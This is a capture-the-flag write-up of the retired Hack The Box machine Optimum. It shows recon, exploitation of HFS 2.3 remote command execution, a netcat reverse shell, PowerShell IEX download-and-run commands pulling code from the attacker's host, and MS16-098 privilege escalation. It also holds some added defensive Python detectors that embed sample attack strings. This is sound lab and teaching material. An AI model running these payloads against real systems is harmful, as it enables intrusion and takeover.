Keep Calm and Hack The Box - Optimum
Hack The Box (HTB) is an online platform that lets you test your penetration testing skills. It contains several challenges that are constantly updated. Some of them simulate real-world scenarios and some lean more towards a CTF style of challenge.
Note. Only write-ups of retired HTB machines are allowed.
Optimum is a beginner-level machine which mainly focuses on enumeration of services with known exploits. Both exploits are easy to obtain and have associated Metasploit modules, making this machine fairly simple to complete.
We will use the following tools from a Kali Linux box to pwn the machine:
nmap
zenmap
searchsploit
metasploit
Step 1 - Scanning the network
The first step before exploiting a machine is to do a little bit of scanning and reconnaissance.
This is one of the most important parts as it will determine what you can try to exploit afterwards. It is always better to spend more time on that phase to get as much information as you can.
I will use Nmap (Network Mapper). Nmap is a free and open source utility for network discovery and security auditing. It uses raw IP packets to determine what hosts are available on the network, what services those hosts are offering, what operating systems they are running, what type of packet filters/firewalls are in use, and dozens of other characteristics.
There are many commands you can use with this tool to scan the network. If you want to learn more about it, you can have a look at the documentation here.
I use the following command to get a basic idea of what we are scanning:
nmap -sV -O -F --version-light 10.10.10.8
-sV: Probe open ports to determine service/version info
-O: Enable OS detection
-F: Fast mode - Scan fewer ports than the default scan
--version-light: Limit to most likely probes (intensity 2)
10.10.10.8: IP address of the Optimum box
You can also use Zenmap, which is the official Nmap Security Scanner GUI. It is a multi-platform, free and open source application which aims to make Nmap easy for beginners to use while providing advanced features for experienced Nmap users.
I use a different set of options to perform an intensive scan:
nmap -A -v 10.10.10.8
-A: Enable OS detection, version detection, script scanning, and traceroute
-v: Increase verbosity level
10.10.10.8: IP address of the Optimum box
If you find the results a little bit too overwhelming, you can move to the Ports/Hosts tab to only get the open ports.
We can see that there is 1 open port:
Port 80. Hypertext Transfer Protocol (HTTP). Here it's an HttpFileServer httpd 2.3
For now, this is our main target.
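Reading service versions out of a screenshot does not scale past one box. The following is an added example, not code from the article: it parses the XML that nmap writes with the real `-oX` option (the `nmap -sV -oX scan.xml 10.10.10.8` form is assumed), lists every open port with its detected product and version, and flags banners that match a small watchlist. The XML document and the watchlist below are constructed to mirror the single finding above (port 80, HttpFileServer httpd 2.3); a defender would feed the same parser from a scheduled scan of their own network to catch an outdated service before anyone else does.

```python
"""Parse nmap XML output (-oX) and flag open services on a watchlist.

Added example, not code from the article. The XML below is constructed to
look like what `nmap -sV -O -F --version-light -oX scan.xml 10.10.10.8` would
emit for the Optimum box; the watchlist is constructed as well.
"""
import xml.etree.ElementTree as ET

# Constructed sample nmap XML, trimmed to the elements the parser reads.
SAMPLE_NMAP_XML = """<?xml version="1.0"?>
<nmaprun scanner="nmap" args="nmap -sV -O -F --version-light -oX scan.xml 10.10.10.8">
  <host>
    <address addr="10.10.10.8" addrtype="ipv4"/>
    <ports>
      <port protocol="tcp" portid="80">
        <state state="open" reason="syn-ack"/>
        <service name="http" product="HttpFileServer httpd" version="2.3" method="probed" conf="10"/>
      </port>
      <port protocol="tcp" portid="135">
        <state state="filtered" reason="no-response"/>
        <service name="msrpc" method="table" conf="3"/>
      </port>
    </ports>
  </host>
</nmaprun>
"""

# Constructed watchlist: (product substring, version prefix, note). A real
# inventory would be driven from a vulnerability feed; this one only carries
# the service the write-up identifies as outdated.
WATCHLIST = [
    ("HttpFileServer", "2.3",
     "Rejetto HFS 2.3 - remote command execution (Exploit-DB 34926 / 39161)"),
]


def parse_open_ports(xml_text):
    """Return one dict per open port: host, port, proto, name, product, version."""
    root = ET.fromstring(xml_text)
    findings = []
    for host in root.iter("host"):
        addr_el = host.find("address[@addrtype='ipv4']")
        addr = addr_el.get("addr") if addr_el is not None else "?"
        for port in host.iter("port"):
            state = port.find("state")
            if state is None or state.get("state") != "open":
                continue  # closed/filtered ports carry no banner worth keeping
            svc = port.find("service")
            get = (lambda k: svc.get(k, "")) if svc is not None else (lambda k: "")
            findings.append({
                "host": addr,
                "port": int(port.get("portid")),
                "proto": port.get("protocol"),
                "name": get("name"),
                "product": get("product"),
                "version": get("version"),
            })
    return findings


def match_watchlist(findings, watchlist=WATCHLIST):
    """Return (finding, note) pairs for services whose banner matches the watchlist."""
    hits = []
    for f in findings:
        for product, version_prefix, note in watchlist:
            if product.lower() in f["product"].lower() and f["version"].startswith(version_prefix):
                hits.append((f, note))
    return hits


if __name__ == "__main__":
    open_ports = parse_open_ports(SAMPLE_NMAP_XML)
    for f in open_ports:
        print(f"{f['host']}:{f['port']}/{f['proto']} {f['name']} {f['product']} {f['version']}".rstrip())
    for f, note in match_watchlist(open_ports):
        print(f"  !! {f['host']}:{f['port']} -> {note}")
```

The version string nmap reports comes from the server banner, so a match is a lead to verify, not proof of a vulnerable build; the same parser runs unchanged over the multi-host XML a full subnet scan produces.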
Step 2 - Visiting the website
Let's try port 80 and visit http://10.10.10.8
At the bottom of the page we can see the server information: an HttpFileServer 2.3.
An HTTP File Server, also known as HFS, is a free web server specifically designed for publishing and sharing files.
The official documentation describes HFS as:
HFS (Http File Server) is a file sharing software which allows you to send and receive files. You can limit this sharing to just a few friends, or be open to the whole world. HFS is different from classic file sharing because there is no network. HFS is a web server which uses web technology to be more compatible with today's Internet. Since it is actually a web server, your friends can download files as if they were downloading from a website using a web browser, such as Internet Explorer or Firefox. Your users don't have to install any new software. HFS lets you share your files. Most web servers are used to publish a website, but HFS is not designed to do that. You are, however, free to use it in any way you wish - but at your own risk.
I use Searchsploit to check if there is any known vulnerability in HFS. Searchsploit is a command line search tool for Exploit Database (Exploit-DB).
I use the following command:
searchsploit HFS
We can see several vulnerabilities, but we will examine the 'Rejetto HTTP File Server (HFS) - Remote Command Execution (Metasploit)' entry with this command:
searchsploit -x 34926.rb
We have a summary of the exploit and the code.
In the description we can see that
Rejetto HttpFileServer (HFS) is vulnerable to remote command execution attack due to a poor regex in the file ParserLib.pas. This module exploits the HFS scripting commands by using '%00' to bypass the filtering. This module has been tested successfully on HFS 2.3b over Windows XP SP3, Windows 7 SP1 and Windows 8.
We can also find the exploit on the Exploit Database website
as well as on the Rapid7 website.
We know that the version of the application is HttpFileServer 2.3.
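The description above gives a defender everything needed to spot this attack in traffic: HFS scripting commands are written as `{.name|args.}` macros, and the bypass works by putting a `%00` (null byte) in front of the macro so the filtering regex in ParserLib.pas stops matching before the macro text. The following is an added detection example, not code from the article or from Rejetto: it parses access-log lines in Common Log Format, percent-decodes each query parameter once (an assumption about how the server reads it), and reports a null byte followed by a macro opener as the strongest signal, with bare macro syntax and bare null bytes as weaker ones. The log lines and severity labels are constructed for illustration.

```python
"""Flag HFS requests that smuggle a scripting macro behind a null byte.

Added detection example, not code from the article or from Rejetto. HFS
macros use the {.name|args.} syntax; the bypass described in the write-up
places a %00 in front of the macro so the server's filter regex stops
matching early. Log lines below are constructed in Common Log Format and
the severity labels are an assumption.
"""
import re
from urllib.parse import parse_qsl, urlsplit

# Constructed sample access log. Lines 2 and 3 carry the same request, the
# second one fully percent-encoded; the other lines are ordinary browsing.
SAMPLE_LOG = """\
10.10.14.27 - - [08/Oct/2019:10:01:02 +0000] "GET / HTTP/1.1" 200 4321
10.10.14.27 - - [08/Oct/2019:10:01:09 +0000] "GET /?search=%00{.exec|calc.exe.} HTTP/1.1" 200 0
10.10.14.27 - - [08/Oct/2019:10:01:11 +0000] "GET /?search=%00%7B.exec%7Ccalc.exe.%7D HTTP/1.1" 200 0
192.168.1.5 - - [08/Oct/2019:10:02:00 +0000] "GET /?search=report%202019 HTTP/1.1" 200 987
192.168.1.5 - - [08/Oct/2019:10:02:30 +0000] "GET /docs/readme.txt HTTP/1.1" 200 120
"""

LOG_RE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)
NULL_THEN_MACRO = re.compile(r"\x00\s*\{\.")  # the filter bypass pattern
MACRO_OPENER = re.compile(r"\{\.[A-Za-z]")    # a macro in user input is never legitimate


def classify_target(target):
    """Return (severity, reason) pairs for one request target (path + query).

    The query is percent-decoded once, so %00 and a literal NUL are treated
    the same way and the fully encoded variant is not missed.
    """
    findings = []
    query = urlsplit(target).query
    for key, value in parse_qsl(query, keep_blank_values=True):
        if NULL_THEN_MACRO.search(value):
            findings.append(("high", f"null byte followed by macro opener in '{key}'"))
        elif MACRO_OPENER.search(value):
            findings.append(("medium", f"macro syntax in '{key}'"))
        elif "\x00" in value:
            findings.append(("low", f"null byte in '{key}'"))
    return findings


def scan_access_log(log_text):
    """Parse CLF lines; return (src, ts, target, findings) for each suspicious request."""
    alerts = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # skip unparseable lines instead of aborting the whole scan
        findings = classify_target(m.group("target"))
        if findings:
            alerts.append((m.group("src"), m.group("ts"), m.group("target"), findings))
    return alerts


if __name__ == "__main__":
    for src, ts, target, findings in scan_access_log(SAMPLE_LOG):
        for severity, reason in findings:
            print(f"[{severity}] {src} {ts} {target}: {reason}")
```

A rule like this belongs on a reverse proxy or log pipeline in front of HFS; it is a detection, not a fix, and the fix is to stop exposing an HFS build affected by this issue.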
We will use Metasploit, which is a penetration testing framework. It's an essential tool for many attackers and defenders.
I launch the Metasploit Framework on Kali and look for the command I should use to launch the exploit.
If you want to get more info on the exploit, you can use the following command:
info exploit/windows/http/rejetto_hfs_exec
And you will get some detailed information on the exploit.
I use the following command to select the exploit:
use exploit/windows/http/rejetto_hfs_exec
I need to set up several options before launching the exploit.
I start by setting RHOSTS with the following command
set RHOSTS 10.10.10.8
and I set SRVHOST (the address of my attacking machine) with
set SRVHOST 10.10.14.23
When I check the options, I get this
I then run the exploit with the command
exploit
And I get a Meterpreter session.
From the Offensive Security website, we get this definition for Meterpreter:
Meterpreter is an advanced, dynamically extensible payload that uses in-memory DLL injection stagers and is extended over the network at runtime. It communicates over the stager socket and provides a comprehensive client-side Ruby API. It features command history, tab completion, channels, and more.
You can read more about Meterpreter here.
Let's start by gathering some information.
getuid returns the real user ID of the calling process and sysinfo returns certain statistics on memory and swap usage, as well as the load average.
If we look closely, we can see that Optimum's architecture is x64, but our meterpreter version is set to x86. We will need to change this!
I put this session in the background with the command
background
I check the module options one more time and I see that the payload options are not correctly set up.
It is using
windows/meterpreter/reverse_tcp
instead of
windows/x64/meterpreter/reverse_tcp
I set up the payload with the following command
set payload windows/x64/meterpreter/reverse_tcp
I get another meterpreter session, and when I check sysinfo, I can see that I have the correct meterpreter version this time, x64/windows.
Step 3 - Looking for the user.txt flag
Now that I have a session, I can list all the files/folders with the following command
ls
And I find the user flag! I can check the content of the file with
cat user.txt.txt
I try to navigate to the Administrator folder but get an "Access is denied" message. I need to do a privilege escalation to capture the root.txt flag.
Step 4 - Using Metasploit for privilege escalation
I will use the module post/multi/recon/local_exploit_suggester
From the Rapid7 website, I get this:
This module suggests local meterpreter exploits that can be used. The exploits are suggested based on the architecture and platform that the user has a shell opened as well as the available exploits in meterpreter. It's important to note that not all local exploits will be fired. Exploits are chosen based on these conditions: session type, platform, architecture, and required default options.
I check the options and I list all the sessions to make sure I pick the right one.
I set the session to 2 to point the module at the x64 meterpreter session
set SESSION 2
and set SHOWDESCRIPTION to get a detailed explanation of any suggested exploits
set SHOWDESCRIPTION true
I launch the module but nothing seems to come back.
Going back to the second session with
sessions 2
and checking sysinfo once again gives us more information on the operating system. We can see it is a Windows 2012 R2.
I do a Google search to find a privilege escalation exploit for Windows 2012 R2 and find this exploit
as well as the official Microsoft Security Bulletin for MS16-032.
Back in Metasploit, I check if there is an exploit available and I find one with
search ms16-032
I check the options and set up the session
set SESSION 3
the LHOST
set LHOST 10.10.14.27
and the target to Windows x64
set TARGET 1
I check the options to see if everything is configured properly.
I launch the exploit but it doesn't seem to work anymore. I will need to exploit it manually without the help of Metasploit!
Step 5 - Creating a low privilege reverse shell
Back in searchsploit, I check the results from
searchsploit HFS
I can see several vulnerabilities, but I will examine the '2.3.x - Remote Command Execution (1)' entry first with this command
searchsploit -x 34668.txt
I have an explanation of the exploit.
I then examine the '2.3.x - Remote Command Execution (2)' entry with this command
searchsploit -x 39161.py
I have a summary of the exploit and the code. I then have a look at the code and the description:
You can use HFS (HTTP File Server) to send and receive files. It's different from classic file sharing because it uses web technology to be more compatible with today's Internet. It also differs from classic web servers because it's very easy to use and runs "right out-of-the box". Access your remote files, over the network. It has been successfully tested with Wine under Linux.
Then at the note, which explains that the exploit depends on a web server to download nc.exe from and leverages it to get the reverse shell:
You need to be using a web server hosting netcat (http://<attackers_ip>:80/nc.exe)
If you check the help section of searchsploit, you can see that it can copy an exploit to the current directory.
I use the following command to copy the file
searchsploit -m 39161.py
Then I use this command to edit the file
nano 39161.py
and change the hard-coded IP address to the one of the attacking machine - my machine in this case
ip_addr = "10.10.14.27" #local IP address
I create a www folder
and I copy nc.exe over.
I launch the exploit. In the first window, on the top left, I launch a small Python server with
python -m SimpleHTTPServer 80
The SimpleHTTPServer module that comes with Python 2 is a simple HTTP server that provides standard GET and HEAD request handlers.
The second window, on the top right, has netcat listening. I set up an Ncat listener on port 443 to catch the reverse shell connection.
Ncat is a feature-packed networking utility which reads and writes data across networks from the command line. Ncat was written for the Nmap Project as a much-improved reimplementation of the venerable Netcat. It uses both TCP and UDP for communication and is designed to be a reliable back-end tool to instantly provide network connectivity to other applications and users.
You can learn more about Ncat here.
nc -nvlp 443
The third window has the Python exploit - I had to launch the script twice, once to trigger nc.exe and again to get the reverse shell.
The Python exploit (3rd window) connects to the Python server (1st window) to download the nc.exe Windows binary. Then nc.exe connects back to the Ncat listener on port 443 (2nd window) and creates a low privilege reverse shell.
python 39161.py 10.10.10.8 80
You can see that the user is kostas on this machine:
C:\Users\kostas\Desktop>
I can then navigate on Kostas' machine to get the user flag!
I check who I am on the machine with the command
whoami
list the files/folders with
dir
and show the user flag content with
type user.txt.txt
I find the user flag! Let's get the root flag now :)
Step 6a - Using GDSSecurity/Windows-Exploit-Suggester
I show the system information with
systeminfo
I copy/paste the output into a systeminfo.txt file.
I will use Windows-Exploit-Suggester from GDSSecurity:
This tool compares a target's patch levels against the Microsoft vulnerability database in order to detect potential missing patches on the target. It also notifies the user if there are public exploits and Metasploit modules available for the missing bulletins.
It requires the 'systeminfo' command output from a Windows host in order to compare it against the Microsoft security bulletin database and determine the patch level of the host.
It has the ability to automatically download the security bulletin database from Microsoft with the --update flag, and saves it as an Excel spreadsheet.
I copy/paste the raw windows-exploit-suggester Python script from the GitHub repository into a file with
nano windows-exploit-suggester.py
We now have our 2 files in the same folder, systeminfo.txt and windows-exploit-suggester.py.
I can find out more about this tool with the following command
python windows-exploit-suggester.py -h
I update the database of the tool with the following command
python windows-exploit-suggester.py --update
I run the script with
python windows-exploit-suggester.py --systeminfo systeminfo.txt --database 2019-10-08-mssb.xls
I can see that there are several unpatched CVEs on this machine. I will target the MS16-032 vulnerability.
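The comparison Windows-Exploit-Suggester performs is simple enough to show in full, and it is the same check a patch-compliance job should be running before an attacker does. The following is an added example, not the article's code and not the tool itself: it parses `systeminfo` output for the OS name, version, architecture and the installed KB ids, then reports every bulletin in a required-patch table that applies to that OS but whose KB is absent. The systeminfo text is constructed to resemble the Optimum host, the bulletin table is constructed, and every KB number in it is a placeholder rather than a real bulletin's KB id.

```python
"""Check a Windows `systeminfo` dump for required hotfixes.

Added example, not the article's code and not Windows-Exploit-Suggester
itself: it reproduces the core of that tool's check. The systeminfo text is
constructed to resemble the Optimum host (Windows Server 2012 R2, x64) and
every KB number below is a placeholder, not a real bulletin's KB id.
"""
import re

# Constructed systeminfo output (trimmed), placeholder KB numbers.
SAMPLE_SYSTEMINFO = """\
Host Name:                 OPTIMUM
OS Name:                   Microsoft Windows Server 2012 R2 Standard
OS Version:                6.3.9600 N/A Build 9600
System Type:               x64-based PC
Hotfix(s):                 3 Hotfix(s) Installed.
                           [01]: KB9900101
                           [02]: KB9900102
                           [03]: KB9900103
Network Card(s):           1 NIC(s) Installed.
"""

# Constructed required-patch table: bulletin -> KB that fixes it and the OS
# names it applies to. Real data comes from the bulletin spreadsheet the tool
# downloads with --update; the KB ids here are placeholders.
REQUIRED_PATCHES = {
    "MS16-032": {"kb": "KB9900201", "products": ["Windows Server 2012 R2", "Windows 8.1"]},
    "MS16-098": {"kb": "KB9900202", "products": ["Windows Server 2012 R2", "Windows 8.1"]},
    "EXAMPLE-INSTALLED": {"kb": "KB9900101", "products": ["Windows Server 2012 R2"]},
    "EXAMPLE-OTHER-OS": {"kb": "KB9900301", "products": ["Windows 7"]},
}

KB_RE = re.compile(r"\bKB\d{6,7}\b")


def parse_systeminfo(text):
    """Extract OS name, version, architecture and the set of installed KB ids."""
    info = {"os_name": "", "os_version": "", "arch": "", "hotfixes": set()}
    for line in text.splitlines():
        label, sep, value = line.partition(":")
        if sep and label.strip() == "OS Name":
            info["os_name"] = value.strip()
        elif sep and label.strip() == "OS Version":
            info["os_version"] = value.strip()
        elif sep and label.strip() == "System Type":
            info["arch"] = value.strip()
        # Hotfix ids sit on their own indented "[nn]: KBxxxxxxx" lines.
        info["hotfixes"].update(KB_RE.findall(line))
    return info


def missing_patches(info, required=REQUIRED_PATCHES):
    """Return sorted bulletin ids that apply to this OS but whose KB is not installed."""
    missing = []
    for bulletin, spec in required.items():
        applies = any(product in info["os_name"] for product in spec["products"])
        if applies and spec["kb"] not in info["hotfixes"]:
            missing.append(bulletin)
    return sorted(missing)


if __name__ == "__main__":
    host = parse_systeminfo(SAMPLE_SYSTEMINFO)
    print(f"{host['os_name']} ({host['arch']}), version {host['os_version']}")
    print("installed:", ", ".join(sorted(host["hotfixes"])))
    print("missing:", ", ".join(missing_patches(host)) or "none")
```

One caveat the tool shares with this snippet: an absent KB is a lead, not proof, because a later cumulative update can supersede the KB without its id ever appearing in the hotfix list, so confirm a hit against the host's actual update history (for example with Get-HotFix) before treating it as exposed.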
Step 6b - Using Sherlock to enumerate KBs
I will use Sherlock to enumerate the KBs on this machine. Sherlock is a PowerShell script to quickly find missing software patches for local privilege escalation vulnerabilities.
You can learn more about Sherlock here.
When I ran the systeminfo command in Step 6a, I could see a list of KBs. KB stands for Knowledge Base. Microsoft defines it as:
The Microsoft Knowledge Base has more than 150,000 articles. These articles were created by thousands of support professionals who have resolved issues for our customers. The Microsoft Knowledge Base is regularly updated, expanded, and refined to help make sure that you have access to the very latest information.
You can learn more about KBs here.
I git clone the Sherlock repository locally and move it to the www/ folder.
I edit the file Sherlock.ps1 and add Find-AllVulns at the end of the PowerShell script with
nano Sherlock.ps1
I then use the following command from Kostas' machine
wget "http://10.10.14.27//sherlock/Sherlock.ps1"
to fetch the file.
I then launch Sherlock with the following command
IEX(New-Object Net.Webclient).downloadString('http://10.10.14.27/sherlock/Sherlock.ps1')
It goes through all the KBs
and returns which ones are vulnerable.
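The `IEX(New-Object Net.Webclient).downloadString(...)` one-liner above is the classic in-memory download cradle, and the `powershell wget ... -outfile` form used later in Step 7 is its file-dropping cousin; both are exactly what process-creation logging on the target should surface. The following is an added detection example, not code from the article or from the Sherlock project: it scores process command lines the way an endpoint rule would (download primitive plus URL is a file download; adding IEX or Invoke-Expression makes it a cradle), and it base64/UTF-16LE decodes `-EncodedCommand` arguments first so the same rules see through that encoding. The sample command lines are constructed; two of them mirror the forms shown in this write-up.

```python
"""Flag PowerShell command lines that download and run remote code.

Added detection example, not code from the article or from the Sherlock
project. Command lines below are constructed; the encoded one is built here
so its base64 is valid. Severity labels are an assumption.
"""
import base64
import re

IEX_RE = re.compile(r"(?i)\b(?:IEX|Invoke-Expression)\b")
DOWNLOAD_RE = re.compile(
    r"(?i)\b(?:DownloadString|DownloadFile|Invoke-WebRequest|Invoke-RestMethod|iwr|wget|curl|Net\.WebClient)\b"
)
URL_RE = re.compile(r"(?i)\bhttps?://[^\s'\"]+")
ENCODED_RE = re.compile(r"(?i)(?:^|\s)-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)")


def decode_encoded_command(cmdline):
    """Append the decoded text of a -EncodedCommand argument, if present and valid."""
    m = ENCODED_RE.search(cmdline)
    if not m:
        return cmdline
    try:
        decoded = base64.b64decode(m.group(1), validate=True).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        return cmdline  # malformed blob: keep the raw line and still scan it
    return f"{cmdline} {decoded}"


def classify_commandline(cmdline):
    """Return (severity, reason) for one process command line, or None."""
    text = decode_encoded_command(cmdline)
    encoded = text != cmdline
    has_url = bool(URL_RE.search(text))
    has_download = bool(DOWNLOAD_RE.search(text))
    has_iex = bool(IEX_RE.search(text))
    suffix = " (encoded)" if encoded else ""
    if has_iex and has_download and has_url:
        return ("high", "in-memory download cradle" + suffix)
    if has_download and has_url:
        return ("medium", "remote file download" + suffix)
    return None


def scan_commandlines(cmdlines):
    """Return (index, severity, reason) for every command line that matches a rule."""
    hits = []
    for i, cmd in enumerate(cmdlines):
        verdict = classify_commandline(cmd)
        if verdict:
            hits.append((i, verdict[0], verdict[1]))
    return hits


# Constructed sample: the encoded cradle is generated so the base64 is valid.
ENCODED_CRADLE = base64.b64encode(
    "IEX (New-Object Net.WebClient).DownloadString('http://10.10.14.27/sherlock/Sherlock.ps1')".encode("utf-16le")
).decode("ascii")

SAMPLE_COMMANDLINES = [
    r'powershell.exe -NoProfile -Command "Get-ChildItem C:\Users"',
    "powershell IEX(New-Object Net.Webclient).downloadString('http://10.10.14.27/sherlock/Sherlock.ps1')",
    'powershell wget "http://10.10.14.27/41020.exe" -outfile "exploit.exe"',
    r"powershell.exe -ExecutionPolicy Bypass -File C:\scripts\backup.ps1",
    f"powershell -NoP -W Hidden -enc {ENCODED_CRADLE}",
]

if __name__ == "__main__":
    for i, severity, reason in scan_commandlines(SAMPLE_COMMANDLINES):
        print(f"[{severity}] #{i}: {reason}")
        print(f"        {SAMPLE_COMMANDLINES[i][:90]}")
```

Feed this from Sysmon event 1 or Windows 4688 with command-line auditing enabled; without the command line recorded, the cradle and a harmless `powershell.exe` launch look identical.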
Step 7 - Using RGNOBJ Integer Overflow for privilege escalation
In Step 6a, when I got the results back from the Windows Exploit Suggester, one of the exploits targets Windows 8.1 (x64).
If we have a look at the Microsoft documentation, we can see that Windows Server 2012 R2 is related to Windows 8.1 and has the same build number. We can assume the exploit might work on it as well.
I look on searchsploit
searchsploit ms16-098
I can also find it on the Exploit Database website.
I use the following command to copy the file
searchsploit -m 41020.c
The exploit needs to be compiled before it can be executed. I check the code with
cat 41020.c
I can see in the comments that the exploit has a pre-compiled Windows binary available that can be used.
I download the binary with the wget command and move the file to my www folder
wget https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/41020.exe
I set up another Python server - I kill the previous one.
python -m SimpleHTTPServer 80
In the other window, on Kostas' machine, I use PowerShell to download the exploit
powershell wget "http://10.10.14.27/41020.exe" -outfile "exploit.exe"
I then execute the exploit with
exploit.exe
I can see that the privilege escalation was a success by checking who I am on the machine
whoami
It returns
nt authority\system
I am admin.
Let's find the root flag now! I navigate up to Users and into the Administrator/Desktop folder. I find the flag!
I use the following command to see the content of the file
type root.txt
Congrats! You found both flags!
Please don't hesitate to comment, ask questions or share with your friends :)
You can see more of my articles here.
You can follow me on Twitter or on LinkedIn.
And don't forget to #GetSecure, #BeSecure & #StaySecure!
Other Hack The Box articles
Keep Calm and Hack The Box - Lame
Keep Calm and Hack The Box - Legacy
Keep Calm and Hack The Box - Devel
Keep Calm and Hack The Box - Beep
Translated from: https://www.freecodecamp.org/news/keep-calm-and-hack-the-box-optimum/